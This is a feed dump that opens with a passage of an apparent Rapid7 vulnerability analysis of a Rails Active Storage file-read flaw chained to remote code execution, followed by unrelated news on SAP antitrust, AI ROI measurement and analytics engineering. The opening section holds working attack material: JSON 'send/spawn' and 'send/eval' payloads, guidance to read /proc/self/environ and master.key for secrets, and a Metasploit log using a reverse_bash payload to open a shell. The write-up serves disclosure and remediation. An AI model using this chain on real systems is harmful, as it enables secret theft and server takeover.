    bytesread += fread(&amp;tmp, 1, 2, fp);

    if ( 128 == bytesread ) {
        /* v5 and v7.3 files have at least 128 byte header */
        mat-&gt;byteswap = -1;
        if ( tmp == 0x4d49 )
            mat-&gt;byteswap = 0;
        else if ( tmp == 0x494d ) {
            mat-&gt;byteswap = 1;
            Mat_int16Swap(&amp;tmp2);
        }

        mat-&gt;version = (int)tmp2; // &lt;-- [17]
        if ( (mat-&gt;version == 0x0100 || mat-&gt;version == 0x0200) &amp;&amp; -1 != mat-&gt;byteswap ) {
            mat-&gt;bof = ftello((FILE *)mat-&gt;fp);
            if ( mat-&gt;bof == -1L ) {
                free(mat-&gt;header);
                free(mat-&gt;subsys_offset);
                free(mat);
                fclose(fp);
                Mat_Critical("Couldn't determine file position");
                return NULL;
            }
            mat-&gt;next_index = 0;
        } else {
            mat-&gt;version = 0;
        }
    }</pre><p></p><p><span>At </span><span><span data-type="inlineCode">[17]</span></span><span>, </span><span><span data-type="inlineCode">Mat_Open</span></span><span> stores the two-byte version field read from bytes 124 and 125 in </span><span><span data-type="inlineCode">mat-&gt;version</span></span><span>. This is separate from the descriptive text that libvips already accepted at the beginning of the file.</span></p><p></p><pre language="c">static int
ReadData(mat_t *mat, matvar_t *matvar)
{
    if ( mat == NULL || matvar == NULL || mat-&gt;fp == NULL )
        return MATIO_E_BAD_ARGUMENT;
    else if ( mat-&gt;version == MAT_FT_MAT5 )
        return Mat_VarRead5(mat, matvar);
#if defined(MAT73) &amp;&amp; MAT73
    else if ( mat-&gt;version == MAT_FT_MAT73 )
        return Mat_VarRead73(mat, matvar); // &lt;-- [18]
#endif
    else if ( mat-&gt;version == MAT_FT_MAT4 )
        return Mat_VarRead4(mat, matvar);
    return MATIO_E_FAIL_TO_IDENTIFY;
}</pre><p></p><p><span>At </span><span><span data-type="inlineCode">[18]</span></span><span>, </span><span><span data-type="inlineCode">ReadData</span></span><span> dispatches </span><span><span data-type="inlineCode">MAT_FT_MAT73</span></span><span> into the HDF5-backed reader. A crafted file can therefore say </span><span><span data-type="inlineCode">MATLAB 5.0</span></span><span> to libvips while still entering MAT 7.3 handling in libmatio. HDF5 userblocks make this possible: the crafted file can place a valid HDF5 superblock after a 512-byte leading block that contains the spoofed MAT header.</span></p><p></p><p><span>HDF5 datasets can use an external backing file, including a caller-chosen path and byte offset. libmatio eventually asks HDF5 to read the dataset:</span></p><p></p><pre language="c">static int
Mat_H5ReadData(hid_t dset_id, hid_t h5_type, hid_t mem_space, hid_t dset_space, int isComplex, void *data)
{
    herr_t herr;

    if ( !isComplex ) {
        herr = H5Dread(dset_id, h5_type, mem_space, dset_space, H5P_DEFAULT, data); // &lt;-- [19]
        if ( herr &lt; 0 ) {
            return MATIO_E_GENERIC_READ_ERROR;
        }</pre><p></p><p><span>Before </span><span><span data-type="inlineCode">[19]</span></span><span>, this read path does not check </span><span><span data-type="inlineCode">H5Pget_external_count()</span></span><span>. HDF5 resolves the external storage entry and copies bytes from the attacker-selected file into the MAT variable's data buffer. libvips then treats those bytes as image pixels and Active Storage returns them in the rendered representation.</span></p><p></p><p><span>The header mismatch also leaves a useful content signature. In the first 128 bytes, the file claims </span><span><span data-type="inlineCode">MATLAB 5.0</span></span><span> at bytes 0 through 9, but carries the MAT 7.3 version and endian tag at bytes 124 through 127. A normal MAT 5 file has the text but not the MAT 7.3 tag. A normal MAT 7.3 file has the tag but not the text.</span></p><h3><span>Why variants are not required</span></h3><p><span>A returned representation is the easiest way to get bytes back, but the advisory states that generating variants is not a separate requirement. Active Storage can also reach </span><span><span data-type="inlineCode">Vips::Image.new_from_file</span></span><span> during image analysis after a blob is attached. Rails's forensic repository documents a </span><span><span data-type="inlineCode">MATLAB_empty</span></span><span> variant in which libmatio reads external bytes while deriving an empty array's dimensions, so those bytes can surface as width and height instead of pixel values. That route does not depend on preserving pixel values.</span></p><p></p><p><span>Representation is one way to trigger the loader. That route needs a direct-upload blob, a representation trigger, and a way to see the image that comes back. The analyzer path can reach the same loader without returning a variant, although the attacker still needs some way to observe the resulting metadata or logs. For exploitation, the returned PNG is more useful because it carries far more data per request.</span></p><h3><span>Why the patch works</span></h3><p><span>The relevant </span><span><span data-type="inlineCode">v8.0.5</span></span><span> to </span><span><span data-type="inlineCode">v8.0.5.1</span></span><span> diff does not add another content-type check. Instead, it loads a new Active Storage Vips initializer from the analyzer path and disables the libvips operations that libvips itself already marks as untrusted:</span></p><p></p><pre language="diff">diff --git a/activestorage/lib/active_storage/analyzer/image_analyzer/vips.rb b/activestorage/lib/active_storage/analyzer/image_analyzer/vips.rb
index 7e682b3b75fda..e262e1a842aa4 100644
--- a/activestorage/lib/active_storage/analyzer/image_analyzer/vips.rb
+++ b/activestorage/lib/active_storage/analyzer/image_analyzer/vips.rb
@@ -2,0 +3,2 @@
+require "active_storage/vips"
+
diff --git a/activestorage/lib/active_storage/vips.rb b/activestorage/lib/active_storage/vips.rb
new file mode 100644
index 0000000000000..16b2ddbfbaad1
--- /dev/null
+++ b/activestorage/lib/active_storage/vips.rb
@@ -0,0 +23,20 @@
+if ActiveStorage::VIPS_AVAILABLE
+  begin
+    # image_processing 2.0 calls Vips.block_untrusted(true) itself when it loads, so it has to load
+    # before the lines below. Leaving it to load later, when the transformer first asks for it,
+    # would disable the loaders again after an application's initializers had re-enabled them.
+    require "image_processing/vips"
+  rescue LoadError
+    # image_processing is only needed to generate variants, not to analyze blobs.
+  end
+
+  unless Vips.respond_to?(:block_untrusted) # &lt;-- [20]
+    raise &lt;&lt;~ERROR.squish
+      libvips's unfuzzed operations are not safe to use with untrusted content, and Active Storage
+      cannot disable them. Disabling them requires libvips 8.13 or later and ruby-vips 2.2.1 or
+      later. Please upgrade libvips and ruby-vips, or remove the ruby-vips gem from your Gemfile.
+    ERROR
+  end
+
+  Vips.block_untrusted(true) # &lt;-- [21]
+end</pre><p></p><p><span>Active Storage's engine loads the Vips analyzer during initialization, so the new </span><span><span data-type="inlineCode">require "active_storage/vips"</span></span><span> runs during boot rather than waiting for a later representation request. At </span><span><span data-type="inlineCode">[20]</span></span><span>, patched Active Storage refuses to boot if the loaded ruby-vips/libvips pair does not expose the blocking API it needs. At </span><span><span data-type="inlineCode">[21]</span></span><span>, it blocks those operations globally. Because </span><span><span data-type="inlineCode">matload</span></span><span> is marked </span><span><span data-type="inlineCode">VIPS_OPERATION_UNTRUSTED</span></span><span>, libvips skips it before the crafted file can reach libmatio.</span></p><h3><span>From file read to code execution</span></h3><p><span>The file read can recover arbitrary files readable by the Rails worker. On Linux, </span><span><span data-type="inlineCode">/proc/self/environ</span></span><span> is a useful first target because it may contain </span><span><span data-type="inlineCode">SECRET_KEY_BASE</span></span><span>, </span><span><span data-type="inlineCode">RAILS_MASTER_KEY</span></span><span>, or service credentials, but the file-read primitive itself is not Linux-specific. Procfs is only a convenient route to Rails signing material. An exploit that relies only on </span><span><span data-type="inlineCode">/proc/self/environ</span></span><span> will miss applications that keep </span><span><span data-type="inlineCode">secret_key_base</span></span><span> in encrypted credentials or legacy </span><span><span data-type="inlineCode">secrets.yml</span></span><span> files. Useful read targets in those cases include </span><span><span data-type="inlineCode">config/master.key</span></span><span>, encrypted credential files, and legacy </span><span><span data-type="inlineCode">secrets.yml</span></span><span> paths. Before using a candidate secret, an exploit can check it against a genuine signed Active Storage blob ID.</span></p><p></p><p><span>Once an attacker has recovered </span><span><span data-type="inlineCode">secret_key_base</span></span><span> and derived the Active Storage verifier key, they can sign a new variation instead of replaying an existing one. Ethiack's write-up uses </span><span><span data-type="inlineCode">instance_eval</span></span><span> for this step. We confirmed that the same Vips-side transformation validation gap also accepts the following JSON-compatible shapes:</span></p><p></p><pre language="json">{"send":["spawn","/bin/sh","-c","id"]}
{"send":["eval","File.write('/tmp/kr2s', %x{id})"]}</pre><p></p><p><span>In image_processing </span><span><span data-type="inlineCode">1.14.0</span></span><span>, </span><span><span data-type="inlineCode">Chainable#apply</span></span><span> invokes the attacker-controlled transformation name on the builder:</span></p><p><span></span></p><pre language="ruby">    def apply(operations)
      operations.inject(self) do |builder, (name, argument)|
        if argument == true || argument == nil
          builder.public_send(name)
        elsif argument.is_a?(Array)
          builder.public_send(name, *argument) # &lt;-- [22]
        elsif argument.is_a?(Hash)
          builder.public_send(name, **argument)
        else
          builder.public_send(name, argument)
        end
      end
    end</pre><p></p><p><span>At </span><span><span data-type="inlineCode">[22]</span></span><span>, a transformation named </span><span><span data-type="inlineCode">send</span></span><span> reaches the builder's public </span><span><span data-type="inlineCode">send</span></span><span> method. The first array element becomes a second method dispatch, which can invoke private </span><span><span data-type="inlineCode">Kernel#spawn</span></span><span> or </span><span><span data-type="inlineCode">Kernel#eval</span></span><span>. Execution occurs while the pipeline is being built, before normal image operations run. In our tests, the representation request returned HTTP 500 because </span><span><span data-type="inlineCode">spawn</span></span><span> or </span><span><span data-type="inlineCode">eval</span></span><span> returns a non-builder value after the payload has already executed.</span></p><p></p><p><span>This RCE path does not depend on a Marshal object gadget. We validated it against Rails </span><span><span data-type="inlineCode">8.0.5</span></span><span> configured with </span><span><span data-type="inlineCode">config.active_support.message_serializer = :json</span></span><span>. We also tested the same structure on older Rails branches whose signed messages used Marshal serialization, but the attacker-controlled data remains a </span><span><span data-type="inlineCode">Hash</span></span><span>, </span><span><span data-type="inlineCode">Array</span></span><span>, and </span><span><span data-type="inlineCode">String</span></span><span> structure rather than a deserialization gadget.</span></p><p></p><p><span>The MAT/HDF5 file read and the missing Vips-side transformation validation are distinct parts of the RCE chain. Rails pull request </span><a href="https://github.com/rails/rails/pull/56995"><span>rails/rails#56995</span></a><span> discusses the same Vips-side validation gap. CVE-2026-66066 matters here because the file read can recover the signing material needed to sign a malicious variation for the built-in representation route.</span></p><h2>Exploitation</h2><p><span>Our </span><a href="https://github.com/rapid7/metasploit-framework/pull/21733" target="_self"><span>Metasploit module</span></a><span> follows the representation-based chain described above. It creates crafted direct-upload blobs, confirms the file read against </span><span><span data-type="inlineCode">/proc/version</span></span><span>, recovers and validates Rails signing material, signs an ImageProcessing variation, and triggers either </span><span><span data-type="inlineCode">send/spawn</span></span><span> for command payloads or </span><span><span data-type="inlineCode">send/eval</span></span><span> for native Ruby payloads.</span></p><p></p><p><span>The module uses the returned PNG representation instead of the narrower </span><span><span data-type="inlineCode">MATLAB_empty</span></span><span> metadata channel because the PNG path returns larger chunks directly in the HTTP response and gives the module a read channel it can validate automatically during secret recovery. A standalone proof of concept targeting an application that only analyzes uploads could reasonably prefer </span><span><span data-type="inlineCode">MATLAB_empty</span></span><span>, but that path depends on an application-specific way to observe width and height metadata or logs. For code execution, the module uses </span><span><span data-type="inlineCode">send/spawn</span></span><span> and </span><span><span data-type="inlineCode">send/eval</span></span><span>, which fit Metasploit command and Ruby payloads directly.</span></p><p></p><p><span>In the lab run below, the representation used by the module resized the image, so the module selected a 20x20 sharpened text-read layout and recovered 180 bytes per request. It then recovered </span><span><span data-type="inlineCode">SECRET_KEY_BASE</span></span><span> from </span><span><span data-type="inlineCode">/proc/self/environ</span></span><span>, signed a JSON variation, and opened a shell as the Rails process user:</span></p><p></p><pre language="shell-session">msf6 &gt; use exploit/multi/http/rails_activestorage_vips_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/rails_activestorage_vips_rce) &gt; set RHOSTS 127.0.0.1
RHOSTS =&gt; 127.0.0.1
msf6 exploit(multi/http/rails_activestorage_vips_rce) &gt; set RPORT 3003
RPORT =&gt; 3003
msf6 exploit(multi/http/rails_activestorage_vips_rce) &gt; set LHOST 172.17.0.1
LHOST =&gt; 172.17.0.1
msf6 exploit(multi/http/rails_activestorage_vips_rce) &gt; run

[*] Running automatic check ("set AutoCheck false" to disable)
[+] Selected the 20x20 sharpened text-read layout (180 bytes per request)
[+] The target is vulnerable. Recovered /proc/version with the 20x20 sharpened layout
[*] Reading up to 65536 bytes from /proc/self/environ
[*] Detected SHA1 Active Support verifier signatures
[*] Detected the Active Support json message serializer
[*] Validated SHA256 key derivation against a signed blob ID
[*] Stored recovered environment bytes in: /home/cryptocat/.msf4/loot/20260731004237_default_127.0.0.1_rails.process.en_047300.bin
[+] Recovered SECRET_KEY_BASE from /proc/self/environ
[*] Triggering the ImageProcessing send/spawn variation using a verifier key derived from /proc/self/environ
[*] Command shell session 1 opened

msf6 exploit(multi/http/rails_activestorage_vips_rce) &gt; sessions -i 1 -c id
[*] Running 'id' on shell session 1 (127.0.0.1)
uid=1000(rails) gid=1000(rails) groups=1000(rails)</pre><p></p><p><span>The SHA1 and SHA256 lines refer to separate Rails settings. The first is the MessageVerifier digest used on the signed blob ID. The second is the key-generator digest used to derive the Active Storage key.</span></p><p></p><p><span>Ethiack's published  1x1 oracle is byte-exact because interpolation has no adjacent pixel values to mix into the result. Our module also tries larger square </span><span><span data-type="inlineCode">uint8</span></span><span> layouts with </span><span><span data-type="inlineCode">/dev/zero</span></span><span> columns between file bytes. With those columns, it can invert image_processing </span><span><span data-type="inlineCode">1.14.0</span></span><span>'s vertical sharpen pass and recover more text per request. We still validate every recovered secret against a genuine Active Storage signature because the larger transport is not byte-exact for arbitrary binary data.</span></p><h2>Remediation</h2><p><span>For remediation guidance, see Rapid7's </span><a href="https://www.rapid7.com/blog/post/etr-kindarails2shell-cve-2026-66066-critical-arbitrary-file-read-and-possible-remote-code-execution-in-ruby-on-rails/"><span>Emergent Threat Response blog</span></a><span> and the Rails </span><a href="https://github.com/rails/rails/security/advisories/GHSA-xr9x-r78c-5hrm"><span>security advisory</span></a><span>. The fixed Active Storage releases block untrusted libvips operations during initialization and require libvips </span><span><span data-type="inlineCode">8.13</span></span><span> or later plus ruby-vips </span><span><span data-type="inlineCode">2.2.1</span></span><span> or later when ruby-vips is installed.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[SAP dodges German antitrust investigation over data extraction]]></title>
<description><![CDATA[SAP is not unfairly preventing enterprises from extracting their data from its systems for use with competitors’ applications, the German Federal Cartel Office (Bundeskartellamt) concluded Thursday after a preliminary investigation.



The Bundeskartellamt does not currently intend to initiate ab...]]></description>
<link>https://tsecurity.de/de/3701254/it-security-nachrichten/sap-dodges-german-antitrust-investigation-over-data-extraction/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3701254/it-security-nachrichten/sap-dodges-german-antitrust-investigation-over-data-extraction/</guid>
<pubDate>Mon, 03 Aug 2026 20:16:54 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">SAP is not unfairly preventing enterprises from extracting their data from its systems for use with competitors’ applications, the German Federal Cartel Office (Bundeskartellamt) concluded Thursday after a preliminary investigation.</p>



<p class="wp-block-paragraph">The Bundeskartellamt does not currently intend to initiate abuse proceedings against SAP, although it will continue to monitor developments in what it views as a dynamic market, it said in a news release.</p>



<p class="wp-block-paragraph">It launched its investigation into SAP’s practices following complaints by software companies including Celonis, a developer of process mining tools, alleging that SAP makes it difficult for customers and third parties to access data from its ERP systems and favors its own Signavio process mining tool.</p>



<p class="wp-block-paragraph">“Companies must generally also be able to use their own data in third-party applications. With large software platforms, in particular, non-discriminatory access to data is crucial to effective competition,” <a href="https://www.bundeskartellamt.de/SharedDocs/Meldung/EN/Pressemitteilungen/2026/07_30_2026_SAP_Celonis.html" target="_blank" rel="noreferrer noopener">said Bundeskartellamt President Andreas Mundt</a>. “Our preliminary investigation has found that there are currently sufficient data extraction options available and that there have so far been no indications of exclusionary practices that may be relevant under competition law.”</p>



<p class="wp-block-paragraph">SAP changed its policies on accessing data held in its applications via APIs in April, <a href="https://www.cio.com/article/4166172/dsag-criticizes-saps-new-api-policy.html">prompting customer pushback</a>.</p>



<p class="wp-block-paragraph">But, said Mundt, the Bundeskartellamt found that despite the API policy change, data extraction options that were previously permissible are still available.</p>



<h2 class="wp-block-heading">Data extraction is possible</h2>



<p class="wp-block-paragraph">SAP welcomed the Bundeskartellamt decision, saying that “as the authority states, SAP customers and partners have sufficient and permissible technical options to extract data from SAP systems and use it in solutions from other providers. The SAP API Policy does not restrict these capabilities.”</p>



<p class="wp-block-paragraph">Celonis also issued a statement, noting that the Bundeskartellamt ruling underlined the continued importance of unrestricted data access, and warning, “The decision is based on the key premise that data extraction for software from providers such as Celonis will remain possible even under SAP’s new API policy — a premise that SAP has been unwilling to confirm to date.”</p>



<p class="wp-block-paragraph">The Celonis statement continued, “We remain steadfast in our conviction that company data belongs entirely to the customers who generate it. No provider should restrict a company’s right to extract its own information or prevent users from working with third-party providers such as Celonis that offer added value to customers.”</p>



<p class="wp-block-paragraph">Celonis is also attacking SAP’s policies on data extraction in court in California. It <a href="https://www.cio.com/article/3847242/celonis-declares-sap.html">filed a complaint in March 2025</a> alleging that SAP was leveraging its software to “prevent SAP customers from sharing their own data with third-party providers, including Celonis, without paying prohibitively expensive fees.” The <a href="https://www.cio.com/article/4016013/us-judge-issues-split-decision-in-antitrust-case-against-sap.html">judge dismissed some of the claims in that case</a>, leaving three to be tested in a trial then scheduled for December 2026. Celonis has since amended its complaint to include 10 claims, and the trial has been rescheduled for 2027, the company said.</p>



<p class="wp-block-paragraph">“Our litigation continues to uncover evidence of SAP’s unlawful behavior, including anticompetitive conduct and theft of intellectual property, and we are confident in the evidence that we will present at trial,” Celonis said following the German authority’s decision.</p>



<p class="wp-block-paragraph">The Bundeskartellamt’s failure to find sufficient evidence to open a ‘formal abuse of dominance proceeding’ is a small win for SAP, said <a href="https://www.infotech.com/profiles/scott-bickley" target="_blank" rel="noreferrer noopener">Scott Bickley</a>, advisory fellow at Info-Tech Research, but “CIOs should not mistake it for a validation of SAP’s data access model.”</p>



<p class="wp-block-paragraph">Although SAP recognizes customers’ right to decide they use their data, it does not make it easy for them to do so, he said. “CIOs may technically retain vendor choice but be faced with expensive replication architectures, API rate and volume restrictions, additional platform costs, performance lags and data migration costs, all with a dependency on an SAP-approved technical pattern, which can be a moving target.”</p>



<h2 class="wp-block-heading">Data ownership as a procurement issue</h2>



<p class="wp-block-paragraph"><a href="https://acceligence.com/talent/profiles/justin-greis/" target="_blank" rel="noreferrer noopener">Justin Greis</a>, CEO of consulting firm Acceligence, sees the decision as an instructive one for enterprise CIOs.</p>



<p class="wp-block-paragraph">“This isn’t a reason to stop asking hard questions of your ERP vendor. Whether it’s SAP, Oracle, Microsoft, Salesforce, or anyone else, enterprises should continue to evaluate how easy it is to access their own operational data, integrate third-party applications, and migrate workloads if business priorities change. Those questions are becoming strategic procurement issues, not just technical ones,” Greis said.</p>



<p class="wp-block-paragraph">CIOs should consider data portability early in the procurement process, said <a href="https://www.linkedin.com/in/kaandincer" target="_blank" rel="noreferrer noopener">Kaan Dincer</a>, CEO of data migration vendor Settle: “Negotiate export rights, API access on reasonable terms, and documentation of the data model before signing and test a real extraction while the vendor still wants your renewal. The cost of your eventual exit is set on the day you implement, not the day you leave. ERP data now feeds analytics and automation outside the system of record, so access friction that used to be an IT annoyance is becoming a strategy constraint.”</p>



<p class="wp-block-paragraph">In the SAP case, he said, “the regulator answered a narrow legal question, not the operational one. Declining to open proceedings means the friction was not shown to be anticompetitive. It does not mean the friction is not real. The Bundeskartellamt’s own findings acknowledge that extracting large data volumes is technically demanding and it said explicitly that it will keep watching as access mechanisms and license models evolve. That is not a clean bill of health. It is a decision to hold fire.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/srinivasulureddybattu/" target="_blank" rel="noreferrer noopener">Srinivasulu Reddy Battu</a>, a senior software engineer with cloud vendor ZT Systems, said the big takeaway is the difference between difficult and impossible. SAP’s argument is that the data migration outside of its environment is possible, but Battu said it can be a time-consuming and expensive process.</p>



<p class="wp-block-paragraph">“When the ruling says ‘various permissible and viable options’ exist, that’s technically true, but it glosses over how much expertise it actually takes to use them,” Battu said. “CIOs should still watch how process mining gets packaged in their contracts. If Signavio comes included by default, teams will naturally start using it and that quietly reduces your negotiating power with other vendors over time. This isn’t just about SAP: Oracle, Microsoft, every major ERP vendor sits on a massive amount of your business data. If any of them decided to tighten their API policies tomorrow, most companies would be scrambling.”</p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI’s measurement crisis is over. The translation crisis is next]]></title>
<description><![CDATA[Last fall, you couldn’t open a business publication without tripping over some version of the same headline: where is the ROI for AI? The anchor for most of that coverage was MIT’s “GenAI Divide” report, which found that despite $30 to 40 billion in enterprise generative AI spending, 95% of pilot...]]></description>
<link>https://tsecurity.de/de/3701255/it-security-nachrichten/ais-measurement-crisis-is-over-the-translation-crisis-is-next/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3701255/it-security-nachrichten/ais-measurement-crisis-is-over-the-translation-crisis-is-next/</guid>
<pubDate>Mon, 03 Aug 2026 20:16:54 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"></p>



<p class="wp-block-paragraph">Last fall, you couldn’t open a business publication without tripping over some version of the same headline: where is the ROI for AI? The anchor for most of that coverage was <a href="https://fortune.com/2025/08/18/mit-report-95-percent-generative-ai-pilots-at-companies-failing-cfo/">MIT’s “GenAI Divide” report</a>, which found that despite $30 to 40 billion in enterprise generative AI spending, 95% of pilots delivered no measurable P&amp;L impact. The bubble takes wrote themselves. Boards asked uncomfortable questions. More than a few AI budgets went into the freezer for the winter.</p>



<p class="wp-block-paragraph">Here’s the detail that got lost in the panic: the study defined success as measurable KPI impact within six months of the pilot. Read that again. A project that transformed how a team worked but was never instrumented to prove it counted as a failure. <a href="https://exec-ed.berkeley.edu/2025/09/beyond-roi-are-we-using-the-wrong-metric-in-measuring-ai-success/">Researchers at UC Berkeley pushed back</a> on exactly this point, arguing that the 95% figure may represent 95% of organizations measuring the wrong things at the wrong time rather than 95% of projects failing to create value.</p>



<p class="wp-block-paragraph">In other words, the AI ROI crisis of 2025 was never really about the AI. It was about measurable verification. Most enterprise AI projects didn’t fail. They were simply built in a way that made success unprovable. If you’re a CIO defending a budget line, that distinction is cold comfort, because “we can’t tell if it worked” and “it didn’t work” produce the same conversation with your CFO. But the diagnosis matters, because the treatment is completely different. You don’t fix an unprovable project with a better model. You fix it by picking a better problem.</p>



<p class="wp-block-paragraph">I’ve <a href="https://thenewstack.io/theres-no-sku-for-ai-a-3-box-framework-to-avoid-ai-failures/">argued before</a> that AI initiatives should start with problems that already have good data and trusted metrics, and over the first half of 2026, the market arrived at that conclusion on its own.</p>



<h2 class="wp-block-heading"><a></a>The quiet correction of 2026</h2>



<p class="wp-block-paragraph">Watch where enterprise AI money actually went in the first half of this year and you’ll see a pattern that never made headlines: a hard pivot toward employee-facing use cases. Agents assisting support reps, sales teams, claims processors, IT help desks. The conventional read is that these are the safe choices, the training-wheels projects companies run while they work up the nerve for customer-facing AI.</p>



<p class="wp-block-paragraph">That read is wrong. The pivot to employee-facing AI isn’t about safety. It’s about scoreboards.</p>



<p class="wp-block-paragraph">Think about what an employee-facing workflow comes with that a greenfield AI initiative doesn’t. You already measure it. Average handle time, first-call resolution, cases closed per week, quota attainment. Those KPIs have years of baseline data behind them. More importantly, they’re politically real. In many organizations, people are bonused on those numbers. Nobody in the room disputes the methodology of a metric that’s been sitting on a comp plan for five years. When you drop an agent into that workflow and the KPIs move in the right direction across the entire employee population, ROI stops being a philosophy seminar and becomes back-of-the-envelope arithmetic. Headcount, fully loaded cost, percentage improvement, multiply.</p>



<p class="wp-block-paragraph">The survey data backs up what I’ve been seeing in the field. <a href="https://foundryco.com/research/research-ai-priorities/">Foundry’s 2026 AI Priorities study</a> found that improving employee productivity is now the single biggest business objective driving AI investment, cited by 55% of IT decision-makers. This publication’s own <a href="https://www.cio.com/article/4178006/state-of-the-cio-2026-cios-set-the-course-for-ai-roi.html">25th annual State of the CIO research</a> tells the same story from the measurement side: lack of clear ROI metrics remains a critical barrier to AI success, cited by 32% of IT leaders, and among organizations that measure AI success at all, operational efficiency and process improvement (40%), employee productivity (34%) and cost reduction (30%) dominate, while revenue impact trails at 27%. And <a href="https://www.deloitte.com/us/en/what-we-do/capabilities/applied-artificial-intelligence/content/state-of-ai-in-the-enterprise.html">Deloitte’s State of AI in the Enterprise</a> found two-thirds of organizations reporting productivity and efficiency gains from AI, while only 20% can point to revenue growth.</p>



<p class="wp-block-paragraph">Notice what those numbers describe. The industry didn’t get better at measuring AI. It got better at picking problems that were already measured.</p>



<h2 class="wp-block-heading"><a></a>The post-mortem question nobody asks first</h2>



<p class="wp-block-paragraph">Which brings us to the diagnostic. When an AI project can’t demonstrate ROI, the instinct is to interrogate the technology. Wrong model. Wrong vendor. Insufficient context. Hallucinations. Sometimes that’s true. But the first question in the post-mortem should be about a decision that was made before a single token was generated: what problem did we pick?</p>



<p class="wp-block-paragraph">Did that problem have good data behind it? And did it have a scoreboard anyone trusted before the AI showed up? If the answer to either question is no, the project was never going to prove anything, no matter how well the technology performed. You can’t demonstrate improvement against a baseline that doesn’t exist, and you can’t win an argument with a metric that was invented the same week as the pilot. The MIT study’s 95% weren’t all technology failures. A meaningful share of them were selection errors, committed months earlier in a planning meeting, by people who chose an exciting problem over a measurable one.</p>



<h2 class="wp-block-heading"><a></a>The bill comes due</h2>



<p class="wp-block-paragraph">Here’s the uncomfortable part. Just as the industry figured out the measurability trick, the goalposts started moving.</p>



<p class="wp-block-paragraph"><a href="https://futurumgroup.com/press-release/enterprise-ai-roi-shifts-as-agentic-priorities-surge/">Futurum’s survey of 830 enterprise IT decision-makers</a> in the first half of 2026 documents the shift: productivity gains fell from 23.8% to 18.0% as the primary ROI metric buyers use to justify AI investment, while hard financial measures, top-line revenue and bottom-line profitability combined, nearly doubled to 21.7%. The productivity argument carried the pilot era. CFOs accepted “the KPIs moved” as an answer for a while. Now, they want hard dollars.</p>



<p class="wp-block-paragraph">This is where the next generation of AI projects will separate winners from the pack, and it requires something almost no one negotiates up front: an ROI exchange rate. That’s the pre-agreed formula, signed off by finance before deployment, that converts KPI movement into currency. One point of first-call resolution improvement equals this many dollars. One hour of engineering time recovered equals that many. It sounds bureaucratic. It’s the opposite. The exchange rate is what lets a project claim its value the moment the KPIs move, instead of spending two quarters in a methodology debate trying to reverse-engineer credit after the fact.</p>



<p class="wp-block-paragraph">Without an exchange rate, even a well-instrumented project tops out at a productivity story. With one, the same project is a P&amp;L story. Same technology, same results, entirely different conversation with the CFO.</p>



<h2 class="wp-block-heading"><a></a>The award was won before deployment</h2>



<p class="wp-block-paragraph">This month CIO celebrates the <a href="https://www.cio.com/">CIO 100 Awards</a>, recognizing technology initiatives that deliver measurable business value. Study those winning projects and you’ll find plenty of impressive technology. But the thing they share isn’t a model or an architecture. It’s that “measurable” was engineered in at problem selection. The winners picked problems with real data and trusted scoreboards, and they agreed with finance on what the score was worth before they started playing.</p>



<p class="wp-block-paragraph">That’s the part of innovation that never makes it on stage, and it’s the part worth copying. So, flip the question that dominated last fall. Don’t ask where the ROI for AI is. Ask whether you picked a problem that could ever answer that question, and whether anyone wrote down the exchange rate.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The missing role in every enterprise AI strategy: The analytics engineer]]></title>
<description><![CDATA[Every enterprise AI strategy these days has mostly the same core cast: Software engineers who log online events data, data engineers who move data from online to offline data warehouses, data scientists who build machine learning models, AI/ML engineers who deploy these models to production syste...]]></description>
<link>https://tsecurity.de/de/3701257/it-security-nachrichten/the-missing-role-in-every-enterprise-ai-strategy-the-analytics-engineer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3701257/it-security-nachrichten/the-missing-role-in-every-enterprise-ai-strategy-the-analytics-engineer/</guid>
<pubDate>Mon, 03 Aug 2026 20:16:54 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Every enterprise AI strategy these days has mostly the same core cast: Software engineers who log online events data, data engineers who move data from online to offline data warehouses, data scientists who build machine learning models, AI/ML engineers who deploy these models to production systems and data analysts who consume these data outputs and help create dashboards and self-serve agents for product and business leadership for informed decision making. Despite this systematic setup, the same mode of failure still keeps recurring across industries: AI outputs contradict the dashboard, executives eventually stop trusting the numbers and there seems to be no clear owner of the gap between them.</p>



<p class="wp-block-paragraph">The missing role is not a brand-new role. It is a discipline that has existed for less than a decade, is still not clearly understood at the leadership level, and has no standardized hiring rubric at most organizations. It is the analytics engineer, and the absence of this role is why most enterprise AI deployments seem to stall before they scale.</p>



<h2 class="wp-block-heading"><a></a>What is analytics engineering ?</h2>



<p class="wp-block-paragraph">Analytics engineering sits right at the intersection between data engineering, data science and business intelligence — it is the discipline responsible for transforming raw data into a trusted, governed, reusable semantic layer with metrics and dimensions that both humans and AI systems can rely on. The role emerged from the dbt ecosystem as well as early data infrastructure work at Netflix around 2016-2018, but remains unclearly defined at the leadership level — most CIOs either conflate it with data engineering or product data science or business intelligence analysts, or don’t have a job family for it at all.</p>



